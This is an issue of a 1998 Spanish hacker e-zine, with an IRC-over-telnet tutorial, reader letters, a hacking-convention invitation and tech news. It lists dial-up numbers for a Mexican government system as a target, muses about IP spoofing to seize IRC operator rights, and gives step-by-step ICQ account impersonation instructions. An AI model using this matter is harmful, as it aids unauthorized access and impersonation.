        "$$$$$$$$$$"             "$$"   o$$   $$o "$$$$$$$$$ $$$$$$$$$$
 $$       "$$$$$$"       $$       $$oo $$$$$$$$$$o  """          o$$$"
 $$$o      "$$$$"       $$$      o$$"  $$$"""$$""   $$$         oooo
 $$$$oo     $$$$      $$$$$   ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$
 $$$$$$$ooo  $$  ooo$$$$$$$    """"""""   """"""    """""""" """"""""""
 $$$$$$$$$$$$$$$$$$$$$$$$$$  oooo                                ooo
 $$$$$$$"""  $$o """$$$$$$$  ""$$                                $$$$
 $$$$""     $$$o     ""$$$$    $$$oooo      $$$$$$$o     oooooo   $$$ oooooo
 $$$"      o$$$$o      "$$$   "$$$$""$$o       "$$$$   o$$""$$$$  $$" $$$"""
 $$       o$$$$$$$       $$    $$$$  $$$ "$$$$""$$$$  $$$     ""  $$$$$$ ""
        o$$$$$$$$$$o           $$$   $$o  $$$o o$$$$o $$$         $$"" $$o
     o$$$$$$$$$$$$$$$$o       o$$$$$ $$$$$  """" """""" "$$$$$$$" $$$$  $$$$$o

\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/

 Pues bien, aqui esta de nuevo esta vieja seccion, espero que les guste y
 que me ayuden a mantenerla viva.....

 Lo que sigue es un sistema que al parecer los se�ores de X-ploit TEAM lo han
 de conocer muy bien, es cenids.ssa.gob.mx y aqui esta una lista de telefonos
 y velocidades a las que puedes conectarte:

        14,400 bps :           9,600 bps:              2,400 bps:

          563-8471             598-7761                598-1467
          563-7895             598-1010                598-4208
          563-8405
          563-9404

     Bueno pues por esta ocasion eso es todo, esperamos contar con su apoyo
 para hacer crecer esta seccion.

 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                    ------------------------------
                     Accediendo al IRC por telnet
                             por Senpai
                    ------------------------------

Alguna vez has pensado como se comunica tu cliente de IRC (el mIRC por ej.)
con el servidor de IRC?. No? Yo tampoco hasta que tuve una conversacion en
la Under con jcl (un saludo chavalote!).


Conectarse al IRC con el telnet
-------------------------------
Si te conectas al IRC via telnet, puedes saber exactamente que cosas le
envias al servidor, y que cosas te envia el servidor a ti, con un cliente de
irc todo esto lo pierdes, simplemente te conectas, chateas un rato, y te vas;
pero como estamos aprendiendo lo mejor es saber como funcionan las cosas, y
no hacer como si fueran una "caja negra" de donde entran y salen mensajes.

Vamos a la practica
-------------------
Lo primero que quiere de ti un servidor de IRC es un password (opcional), y
un nick. Una vez le has proporcionado estos datos, te envia un ping al que
tienes que responder (si no respondes te desconecta!), y despues de hacer
esto le tienes que enviar un mensaje identificando el usuario (tu).

Vamos a ver esto con un ejemplo real:
Ejecuta algun programa de telnet, y haz telnet al servidor de IRC. Tendras
que usar algun puerto que tengan destinado a IRC (normalmente el 6667 lo
tienen todos disponible).

Una vez hecho esto, te conectara, pero no aparece nada por pantalla.

Dale un password (el que quieras, da igual). La sintaxis es:
PASS password
Ej:
	PASS hola

Despues le das el nick que quieras.
Sintaxis: NICK nick
Ej:
	NICK pableras

Si el nick esta ocupado el servidor te enviara un mensaje para que pongas
otro.

Una vez el servidor acepta el nick, te envia un PING con un numerito, algo
asi:
PING :11528997809137948565

y tu te tienes que responder con un PONG y el numerito. Escribe:
PONG 11528997809137948565

Date prisa en responder, porque si no te desconecta por "ping timeout".

El servidor te enviara un ping de este tipo de forma periodica mientras
estes conectado, cada vez que te envie uno, tienes que responderlo, que si
no te desconecta.

Una vez echo esto le tienes que enviar un mensaje de USER.
Sintaxis: USER NombreDeUsuario NombreDelHost NombreDelServidor NombreReal

Atencion al poner el nombre real, debes poner dos puntos(:) antes.
Ej:
	USER pepe aki alli :Pepito de los palotes

Una vez hecho esto te enviara un mensaje de bienvenida.
Esto es un trozo de un log real:

pass dsthgdi
nick pep_1
PING :11528277839637248565
pong 11528277839637248565
user sol solo sol :TO
:fenix.irc-hispano.org 001 pep_1 :Welcome to the Internet Relay Network pep_1
:fenix.irc-hispano.org 002 pep_1 :Your host is fenix.irc-hispano.org, running version u2.9.32
:fenix.irc-hispano.org 003 pep_1 :This server was created Fri Feb 7 1997 at 17:07:32 MET
:fenix.irc-hispano.org 004 pep_1 fenix.irc-hispano.org u2.9.32 dioswk biklmnopstv
:fenix.irc-hispano.org 251 pep_1 :There are 2151 users and 1382 invisible on 21servers
:fenix.irc-hispano.org 252 pep_1 7 :operator(s) online
:fenix.irc-hispano.org 253 pep_1 6 :unknown connection(s)
:fenix.irc-hispano.org 254 pep_1 1185 :channels formed
:fenix.irc-hispano.org 255 pep_1 :I have 359 clients and 1 servers
:fenix.irc-hispano.org NOTICE pep_1 :Highest connection count: 690 (689 clients)
:fenix.irc-hispano.org 375 pep_1 :- fenix.irc-hispano.org Message of the Day
:fenix.irc-hispano.org 372 pep_1 :- 14/10/1997 12:21
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Bienvenidos al servidor de IRC de Arrakis
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- -----------------------------------------
				.
				.
		Aqui siguen muchas lineas de bienvenida..
				.
				.
:fenix.irc-hispano.org 372 pep_1 :-
:fenix.irc-hispano.org 372 pep_1 :- Esta es la politica de este servidor:
:fenix.irc-hispano.org 372 pep_1 :- puertos 6665, 6666, 6667, 6668 y 6669.
:fenix.irc-hispano.org 372 pep_1 :-   Por favor repartiros por estos puertos, :fenix.irc-hispano.org 372 pep_1 :- con ello. Gracias.
:fenix.irc-hispano.org 372 pep_1 :-
------------------------------------------
:fenix.irc-hispano.org 376 pep_1 :End of /MOTD command.


Por fin! ya estamos conectados! Con el mIRC es mas facil eh....

Ahora ya estamos conectados al IRC, solo nos falta entrar en algun canal a
ver lo que se cuece no?, pues vamos alla.
El comando para entrar es JOIN canal.
Ej:
JOIN #el_amor_universal

Una vez entramos dentro de un canal empezaremos a ver lo que se esta hablando
Ahi va otro pedazo de log como ejemplo:

join #mexicano
:pep_1!~
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  JOIN :#mexicano
:fenix.irc-hispano.org 332 pep_1 #mexicano :joro�a que joro�a
:fenix.irc-hispano.org 333 pep_1 #mexicano Rommel 908311068
:fenix.irc-hispano.org 353 pep_1 = #mexicano :pep_1 @senpai @ChemiX @Rommel
@Thays @Scytale
:fenix.irc-hispano.org 366 pep_1 #mexicano :End of /NAMES list.
:Scytale!
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  NOTICE pep_1 :Bienvenido a #mexicano. El dia 3 este canal estara cerrado con motivo de la huelga de Internet. Secundala! Joro�a que Joro�a!
:Rommel!
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  PRIVMSG #mexicano :yo no lo hubiera dich
o mejor....
:Thays!
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  PRIVMSG #mexicano :que sabemos lo que se pierde
:Mendes!
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  JOIN :#mexicano
:Mendes!
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  NICK :Mefisto

En este log puedes ver que cuando te unes a un canal te sale una lista con
la gente que hay en el canal, y te envian el NOTICE del canal.
Tambien se puede ver al final como entra un nuevo usuario (Mendes) al canal.

Mas cosas....
Ya nos hemos conectado al servidor IRC y estamos dentro de un canal, y
ahora el paso logico es chatear!.
El comando para enviar mensajes es PRIVMSG
PRIVMSG destino1,destino2,.. Mensaje

En destino puedes poner un nick o un canal o una lista de ellos.
El mensaje ha de ir precedido por los dos puntos (:)
Ej:
	PRIVMSG pepe :Hola pepe me recibes?
	PRIVMSG #amor :Busco chica para relacion formal...

Creo que se pilla el concepto no?

Bueno voy a dejarme de chateo y voy a ver que hay por ahi...
Prueba a darle al comando HELP, te saldra algo como:
help
:fenix.irc-hispano.org NOTICE pep_1 :PRIVMSG
:fenix.irc-hispano.org NOTICE pep_1 :NICK
:fenix.irc-hispano.org NOTICE pep_1 :NOTICE
:fenix.irc-hispano.org NOTICE pep_1 :JOIN
:fenix.irc-hispano.org NOTICE pep_1 :MODE
:fenix.irc-hispano.org NOTICE pep_1 :QUIT
:fenix.irc-hispano.org NOTICE pep_1 :PART
:fenix.irc-hispano.org NOTICE pep_1 :TOPIC
			.
			.
		Un monton de comandos mas.....
			.
			.
:fenix.irc-hispano.org NOTICE pep_1 :INVITE
:fenix.irc-hispano.org NOTICE pep_1 :KICK
:fenix.irc-hispano.org NOTICE pep_1 :WALLOPS
:fenix.irc-hispano.org NOTICE pep_1 :PING
:fenix.irc-hispano.org NOTICE pep_1 :PONG
:fenix.irc-hispano.org NOTICE pep_1 :SILENCE
:fenix.irc-hispano.org NOTICE pep_1 :GLINE
:fenix.irc-hispano.org NOTICE pep_1 :NOTE
:fenix.irc-hispano.org NOTICE pep_1 :SERVICE
:fenix.irc-hispano.org NOTICE pep_1 :HASH
:fenix.irc-hispano.org NOTICE pep_1 :DNS
:fenix.irc-hispano.org NOTICE pep_1 :REHASH
:fenix.irc-hispano.org NOTICE pep_1 :RESTART
:fenix.irc-hispano.org NOTICE pep_1 :DIE

Estos son los comandos que tiene implementados el servidor de IRC.

Si has leido hasta aki te preguntaras, y para que quiero yo conectarme al
IRC con el telnet??? Si con mi cliente me complico menos la vida!
Pues para aprender, solo eso. Ademas si algun dia te interesa programar un
cliente para IRC, necesitaras saber como funciona no?
Ademas, si echamos a volar un poco la imaginacion... si tenemos la IP de un
operador, y enviaramos paquetes con ordenes con la ip del operador.. no
tendriamos sus privilegios? podriamos ser operadores en todos los canales...
incluso podriamos ser IrCops haciendonos pasar por ellos falseando nuestra
ip, no?
Pero esto plantea nuevos problemas... hay que averiguar desde que puertos se
conecta el operador, el servidor que usa, los numeros de secuencia de los
paquetes tal vez?
Esto os lo dejo a vuestra imaginacion.
Hay muchisimos mas comandos en IRC, pero con esto que he contado tienes
suficiente para empezar a experimentar.
Si a alguien le interesa el tema hare una segunda entrega con explicacion a
mas comandos y un pokito mas del tema del spoofing en irc, asi que mandadme
mails si os interesa todo esto.

Tengo que agradecer a jcl que me despertara el interes sobre el tema del IRC
que era algo que tenia completamente apagado...

Si os interesa el tema mi email es: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   ahi podeis enviar
vuestras sugerencias y criticas a mi articulo (esta hecho en un tiempo record
de 30 minutos asi que seguro que tiene fallos).

Para profundizar mas sobre el tema os recomiendo que os leais la RFC 1459.

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

                       */*\/*\/*\/*\/*\/*\/*\*
		      /                       \
		    *|*   CARTAS DEL LECTOR   *|*
		    *|*   -----------------   *|*
		      \                       /
		       *\*/\*/\*/\*/\*/\*/\*/*

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  A parte de felicitarles por su revista, y decirles ke se den un paseito
  por el web de abajo del todo (si el ke pone Necronomicon...), y se miren
  la Guia de Temas Olvidados y se meten a A�adir un Enlace y me rellenen
  el formulario, porke me gustaria ponerles un link en esa seccion dentro
  de Red, pero no se ke descripcion ponerles. Asi ke solo dense una vuelta
  me envian el formulario y chapooo...

  Pasando al tema ke keria comunicarles... Seguro ke no conocian la
  existencia de la Red de IRC Union Latina, pero fijo ke si conocian el
  IRC-Hispano. Pues nada pasarles los servers de la Red de IRC Union
  Latina:

  Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org
  Union Latina: Digital (ES, Madrid): madrid.unionlatina.org
  Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org
  Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org
  Union Latina: Lander (ES, Madrid): lander.unionlatina.org
  Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org
  Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org

  Su web oficial es:

  http://www.unionlatina.org

  Y el Bot de esta Red es KaOs. Ke porke les interesaria esta red????...
  pueee. porke es una red alternativa al IRC-Hispano y no hay IRCops
  fascista como en la otra... Aunke es una pena antes habia un server de
  Mexico y otro de Puerto Rico, pero se han caido y no creo ke vuelvan...
  Por  cierto si conocen por alla el otro lado del charco, algun server ke
  pudiera unirse a Union Latina comunikenmelo ke yo se lo digo a un par de
  IRCops... Siguiendo con el tema... pues ke keremos ke esta sea la red
  donde hablen todos los hispanos del mundo... asi ke ya saben  a darse
  una vuelta por la red...

  Pueee nada maxxxx... espero ke si pueden lo comuniken en su e-zine, pa
  ke la gente sepa ke hay otras redes Hispanas aparte del IRC-Hispano...

  Ale... ke sigan tan bien con su e-zine... y ke no decaigan...

  Mushas GraciaX por todo... se despide un espa�olito de ustedes...


  [ Tomad nota todos los IRCmaniacos ... seguro que la red latina esta
    genial ... no lo olvideis ... ]

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  amigos de RareGazz :

  HIzes desde ARGENTINA

  La presente es para solicitar autorizacion para difundir su fantastica
  revista en mi web ------> members.xoom.com/rifoxxx

  Esta de mas decir q es una de las mejores del MUNDO y que he aprendido
  mucho con ella


  [ Pues claro!!!! Todo el que quiera tener nuestro e-zine en su web que nos
    mande un mail indicandonos la ruta exacta de donde esta cada numero y lo
    publicaremos como mirror en nuestra seccion de magazines ]

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			UnderCon  II
		Octubre de 1998 Murcia/Espa�a
			-Invitacion-

  Fecha:
  ------
  Primer fin de semana de Octubre. Viernes 2, Sabado 3 y Domingo 4.

  Lugar:
  ------
  Murcia capital. Punto de contacto CyberCafe Java.
  La forma de llegar es muy sencilla tanto en coche, autobus, tren e incluso
  avion.

  Condiciones:
  ------------
  - Cada grupo invitado contara con una persona de contacto que se encargara
    de enviarle la invitacion, solucionarle dudas, y guiarle por la ciudad.
  - Para mantener un nivel aceptable de asistencia, solo se permitira la entrada
    de personas invitadas y acompa�antes. (Identificados mediante la tarjeta
    que tendreis que imprimir y rellenar, y que os sera enviada junto a esta
    correo)
  - No tenemos previsto cobrar entrada, salvo si es necesario cubrir los pocos
    costes que el evento pueda originar.
  - Comida y alojamiento son de libre eleccion, la organizacion aportara un
    local en el que se pueda dormir (Con sacos de acampada) y recomendara
    restaurantes donde comer, aunque se podra libremente optar por otras
    alternativas.
  - No se tiene previsto disponer de sitio para colocar ordenadores, aunque
    los equipos portatiles seran bienvenidos.
  - Disponer de un telefono movil sera recomendable a la hora de mantener el
    contacto.

  Contenido:
  ----------
  - Los dos temas centrales del congreso seran el phreaking y el hacking,
    aunque tambien se trataran temas como programacion de virus, ingenieria
    inversa, carding, etc...
  - Se impartiran una serie de conferencias, tanto por oradores locales como
    por cualquier invitado que se sienta capaz.
  - Se organizaran los habituales debates y tertulias, donde conocer a la
    gente. Este a�o intentaremos dividir a la gente en grupos para evitar la
    masificacion de oradores.
  - Tal vez si el tiempo lo permite se organice algun concurso, trivial-hack,
    lanzamiento de moviles, etc...
  - El sabado noche se organizara un ruta turistica por los garitos de la
    ciudad.

  Conferencias:
  -------------
  -Introduccion a las redes X25 por Dark Raver
  -Seguridad en comunicaciones inalambricas por CPNE
  -DNS spoofing Fatuo & Dark Raver
  -Chaping por TDD
  -Contratacion de un numero 900s en Espa�a por Fatuo & Warezzman
  -Cualquier otra que los invitados esten dispuestos a dar.

  Grupos Asistentes:
  ------------------
  -RareGaZz   :)
  -CPNE
  -KTD
  -TDD
  -Hispahack
  -Com30
  -NPT
  -Vieja Guardia
  -29A
  -etc...

  Consultas:
  ----------
  Es muy recomendable confirmar la asistencia con antelacion. Asi que incluso
  aunque no tengais dudas, seria muy importante que escribais un peque�o
  mensaje a la siguiente direccion: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

  Es tambien muy importante que contacteis con vuestra persona de contacto
  para solucionar todos los detalles de vuestra asistencia.

  Esta invitacion puede ser distribuida entre todos aquellos posbiles
  interesados en el tema, siempre que sean de vuestra confianza y pudean
  aportar su experiencia al evento.

  Recomendamos maxima discrecion a la hora de comentar este tema.

  Mas detalles os seran dados en un mensaje de vuestra persona de contacto,
  en el que tambien recibireis el gif de la tarjeta de identificacion que
  necesitareis imprimir y rellenar, y que hara las veces de invitacion.

  Saludos


  [ Pues si alguno quiere ir que me envie un mail a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
    para que le de la invitacion correspondiente. Yo fui el a�o pasado y este
    voy a repetir ... no os lo podeis perder!! ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

			    =-_-=-_-=-_-=-_-=
			   |                 |
			   |    NOTILOONZ    |
			   |    ---------    |
			   |  _   _   _   _  |
			    =- -=- -=- -=- -=
_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			Novedades en el caso Vesatec
			----------------------------

  El  caso mas  reciente y  bochornoso contra  la libertad  de expresion  en
  Internet  da un  paso importante  hacia adelante... la  sede central de la
  BaSurA (BSA),  ha decidido  cerrar la sucursal de Barcelona, prescindiendo
  de  su colaborador el  Sr. X.  Ribas, hasta ahora conocido como el Abogado
  Anti-Pirateria... jejjejejej, como se le conocera ahora?
  Las malas  lenguas dicen  que desde que se incorporo el nuevo  director de
  Microsoft  Espa�a (recordemos  que la  mayor parte  de la BSA, pertenece a
  esta  empresa), las  cosas han  cambiado mucho,  y supongo  que al revisar
  nuestro  caso, informaron  a cierta  persona en  Redmond, que  no le haria
  mucha  gracia, coincidiendo  con su  visita a  Lisboa (el mismo dia que yo
  cumplo  a�o, el 9/9)  y su  posible visita  a Espa� a posterior,  pues han
  decidido limpiar un poco en casa.

  Por  cierto segun  fuentes de  toda solvencia,  el caso Vesatec, aparte de
  otro de similares caracteristicas ocurrido en Italia en fechas antes de lo
  nuestro (y  que por cierto se resolvio a favor de los acusados), es uno de
  los mas importantes  de Europa,  y esta en la mira de buffettes abogaciles
  muy prestigiosos.

  Teneis toda la informacion del suceso en http://bsatec.org

  Salu2
  Angeloso

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	      Ampliarian el caso judicial de microsoft
	      ----------------------------------------

  El Departamento  de Justicia  de los  Estados  Unidos  y  los 20  estados
  norteamericanos  que estan demandando  a Microsoft  planean  aumentar  la
  presion sobre  la empresa de  Bill Gates al incluir alegatos sobre nuevas
  presuntas  practicas monopslicas y  da�inas  por  parte del  gigante  del
  software.  Las nuevas  acusaciones podrian  ser presentadas  hoy mismo  e
  incluirian evidencia que  demostraria que Microsoft presiono a Intel para
  que   no  tuviera  en  cuenta  el  software  de  su  competidor  Netscape
  Communications, que  manipulo su  sistema operativo  Windows para  que no
  pueda trabajar  con productos de otras firmas, y que intento dividirse el
  mercado del software de audio y video con Apple Computer, de acuerdo a lo
  publicado  por el Seattle Times. Segun estipula la ley norteamericana, el
  gobierno y los estados solo pueden incluir nueva evidencia en caso de que
  la misma esta relacionada  con los  cargos antes presentados. El juez que
  entiende en la causa, ahora debera determinar si la nueva evidencia puede
  ser  tenida en  cuenta para  el juicio  que  comenzara  el proximo  23 de
  septiembre.

  http://www.news.com/News/Item/0,4,25858,00.html?st.ne.4.head

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	Nuevo sistema para acceder a los E-Mails sin encender el PC
	-----------------------------------------------------------

  Un novedoso servicio de notificacion de emails original de Israel que esta
  desembarcando en los Estados Unidos propone una pratica manera de chequear
  el  correo electronico.  MailPush, como  es  conocido  el  nuevo  sistema,
  permite  a los  usuarios con  cuentas de  email acceder  a  sus mensajes a
  traves de faxes,  telefonos, celulares  o pagers sin la necesidad de estar
  en  permanente contacto  con sus  computadoras. El  sistema,  que  tambien
  notifica  a quien  envia el mensaje  que sus emails llegaron a destino, es
  ofrecido  directamente a traves  de Internet por una unidad de Cellcom, la
  empresa de telefonia celular mas grande de Israel. MailPush tambien planea
  distribuir  el servicio  a traves  de las empresas proveedoras de Internet
  (ISP), al mismo tiempo que no descartan implementarlo  en forma  directa a
  traves de las  compa�ias de  telefono. Marc Schechtman,  vicepresidente de
  MailPush, manifesto  que proyectan  que "de  aqui a  un a�o,  el 5% de los
  usuarios norteamericanos  de Internet  se suscriban  al  servicio",  y que
  planean llevarlo a otros 20 paises en un futuro cercano.

  http://www.news.com/News/Item/0,4,25856,00.html?st.ne.1.head

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       Microsoft recharo las acusaciones de Sun con respecto a Java
       ------------------------------------------------------------

  A traves  de un documento  presentado  ante la corte  que interviene en el
  caso  el viernes pasado, Microsoft  rechazo  energicamente  las intimacion
  preliminar presentada  por Sun Microsystems en su contra alegando  que una
  accion de ese tipo "causaria no solo un gran da�o a Microsoft sino tambien
  a sus distribuidores,  revendedores, desarrolladores de software e incluso
  a  los propios  usuarios". En  el mes de mayo, Sun presento una intimacion
  preliminar argumentando  que el Windows 98 incluye una version de Java que
  es incompatible con la desarrollada  por ellos, por lo que solicita que se
  obligue a Microsoft a incluir  la version de  Sun en  el flamante  sistema
  operativo  y que se  le impida a  la compa�ia  de Bill Gates distribuir el
  Visual  6.0  hasta  tanto  no  sea  totalmente  compatible  con la version
  standard  del Java  de Sun. En su descargo realizado el viernes, Microsoft
  manifesto que no solo la empresa cumplio  con la licencia  sobre Java  que
  mantiene con Sun,  sino que todos  sus productos  son  compatibles con  el
  sistema en cuestion.

  http://www.techweb.com/wire/story/TWB19980828S0001

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	Una falla en Hotmail expuso los password de los usuarios
	--------------------------------------------------------

  El proveedor  de mail  gratuito de  Microsoft admitio  que esta intentando
  reparar el problema originado en el servicio de correo de Hotmail, el cual
  permitio que programadores malintencionados de JavaScript pudieran alterar
  y vulnerar los passwords de los usuarios. El problema se detecto cuando la
  empresa  Specialty Installations publico  una demostracion del mismo en su
  site  "Porque  Podemos",  el   cual  esta  dedicado   a  los   trabajos  e
  investigaciones  no rentadas  de los  programadores de  paginas web  de la
  compa�ia canadiense. Apodado "Hot" Mail,  la muestra consta de un mail que
  contiene  el   denominado  Caballo  de  Troya,  un  sistema  que altera la
  interface de  los usuarios  con Hotmail.  Una vez modificada la interface,
  cualquier  comando que se ejecuta produce un mensaje falso por "expiracion
  de tiempo",  y pide que  se reingrese el nombre y password. Al cumplir con
  la requisitoria, el usuario  retorna al  site standard de Hotmail, pero el
  nombre y  la clave  personal en  ese momento  llegan a  las manos  de  los
  delincuentes  o, en  este caso de demostracion, a Specialty Installations.
  Sean  Fee,   ejecutivo  de   Hotmail,  manifesto   que  estan   trabajando
  intensamente  ya que  "la  proteccion de  los mails  y las  cuentas de los
  clientes son de vital importancia para la compa�ia".

  http://www.news.com/News/Item/0,4,25620,00.html?st.en.fd.gif.f

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			    Bug del ICQ
			    -----------

  Un tipo  Zachary Allison,  ha logrado  traspasarla seguridad  del ICQ  y
  hacerse pasar  por cualquier  usuario. Esta  persona ha echo un clon del
  icq pero  para linux,  el zICQ, para linux, tomando las fuentes del mICQ
  y modificandolas,  pero  este no tiene  la  limitacion  de pass  del  de
  Mirabilis, ya que este permite pass de mas de 8 caracteres, al contrario
  que  el oficial  que solo  permite 8, y aqui esta el fallo que permite a
  un usuario  suplantar a otro previo conocimiento de su UIN, si mandas un
  pass de  mas de 8  caracteres el buffer  de los servidores falla y te da
  acceso como el UIn que le digas.

  Primero se debe bajar el zICQ en: http://hookah.ml.org/zicq

  Usa tu  programa ICQ  para ver si el usuario legitimo esta conectado, si
  asi es espera que se desconete.

  Conecta con el zICQ, da el UIN que quiereas y el pass "123456789"

  El autor  dice que  esto no es spoofing, que simplemente estas conectado
  como el usuario seleccionado y que puedes recibir y mandar mensajes como
  si fueras el.

  Funcionara siempre y cuando otro UIN no se haya logueado como el UIN por
  el que te vas a hacer pasar..

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

		   Bug del E-Mail del Netscape y del Outlook
		   -----------------------------------------

  Dos  investigadores de  la Universidad  finlandesa  de Oulu, Ari Takanen y
  Marko Laakso, han  descubierto  un fallo de  programacion en los programas
  gestores  de correo  electronico  de Netscape y  Outlook de Microsoft, que
  permitirman a intrusos informaticos con malas intenciones destruir o robar
  documentos  e  insertar  diferentes  virus  en  nuestro  ordenador.  Tanto
  Netscape como Microsoft han  confirmado el hecho y han empezado a elaborar
  contrareloj "parches" o programas que corrijan el defecto.

  El defecto  o "bug" se  produce sin necesidad de abrir el mensaje, lo cual
  ha disparado  la alarma en  la comunidad de Internet, pues hace revivir un
  viejo fantasma que  asolo la red en los primeros a�os, cuando se penso que
  la recepcion de un simple mensaje de correo electronico podria servir para
  que  alguien  entrara  en  nuestro  ordenador.  Algunos  desaprensivos  se
  encargaron  a lo  largo de  los ultimos  a�os  de mantener  vivo el temor,
  lanzando falsas ideas  del tipo de "si usted abre un mensaje que lleve por
  titulo  "Win  a  holiday"  o "Good  times"  infectara  automaticamente  su
  maquina".

  La noticia  hoy es que existe la posibilidad de que simplemente recibiendo
  un correo con  un archivo  adjunto, uno puede perder el control del propio
  ordenador. Cuando el fichero adjunto lleva un nombre extremadamente largo,
  con una extension  superior a la que admite el sistema, el programa lector
  de correo  se queda "colgado". Pero  antes de ello, al parecer, se ejecuta
  el fichero en cuestion, que  puede consistir en un virus o, por poner otro
  ejemplo, en un programa para copiar el contenido del disco duro y enviarlo
  por  la red.  Uno de  los mayores  expertos en  seguridad en  Espa�a, Jose
  Manuel Gomez, coordinador del sitio web Kriptspolis,http://kriptopolis.com
  en el  que se  da una  amplia informacion  del tema,  ha asegurado  en  su
  boletin   que  "los   usuarios  estan  ahora   desprotegidos  y,  dada  la
  implantacion de  los programas de  correo, tenemos al diablo sentado en la
  mesa".

  Sin embargo, a pesar de la convulsion, el modo  concreto de  explotar este
  "bug"  aun no  ha sido  difundido. Tampoco  han  trascendido  noticias  de
  ataques. Netscape  ha se� alado que  en los  proximos dias  difundira  una
  version que evite el problema, mientras Microsoft ha recomendado que no se
  lean los mensajes con ficheros adjuntos de comunicantes desconocidos.
  Netscape ha pedido  que "bajo  ninguna circunstancia  se active el menu de
  Archivo  cuando  el  mensaje  esta  seleccionado".  Ambos  fabricantes  de
  software  sugieren visitas periodicas a sus paginas dedicadas a seguridad,
  pues tan pronto tengan el "antidoto" lo difundiran.

  La fuerte  competencia entre  los navegadores  ha llevado  a  ambas firmas
  rivales a comercializar software con errores tan  graves como estos, segun
  coinciden diversos  programadores  consultados por  nuestro  diario.  Como
  fuente de informacion adicional, se recomienda News.com,  asi como el foro
  mas  prestigioso  de  la  red  en   cuestiones  de  "bugs"  y  errores  de
  programacion: http://www.ntbuqtraq.com,dsd.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			    Bug del Windows 98
			    ------------------

  Aparentemente el  Windows 98  tiene un  bugs que funciona de la siguiente
  manera. El  mal llamado sistema  operativo (para mi  software de sistema)
  parece que  se resetea  solo, a  determinada hora  de determinados  dias.
  Parece que entre las 23:59 Hs. y las  24:00 Hs. (0:00 Hs.) del dias 31 de
  diciembre de cada a�o, dicho software se reinicia, solo sin ningun motivo
  aparente y  sin previo aviso, como si se hubira pulsado la tecla Reset de
  la CPU.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

		  La RareDudeZz esta cerca de los 500 usuarios
		  --------------------------------------------

  La lista de correo  de RareGaZz (mas conocida  por RareDudeZz) comenzo  a
  funcionar  con la  unica intencion  de  avisar a nuestros lectores de las
  apariciones  de nuevos  numeros en nuestro e-zine, pero se ha convertido,
  gracias  a  todos, en  uno  de  los mayores  foros hispanos  sobre  temas
  underground.

  Hoy dia has cerca de 500 usuarios  suscritos y se recibe una  media de 20
  o 30 mails diarios.
				
  El tema principal de la lista es el Hacking pero  tambien se tratan otros
  temas y  se ayuda  a la  gente mas  iniciada, que  parece que  estan algo
  perdidos.

  Una vez  mas quiero  recordar  las  normas de la lista, las cuales podeis
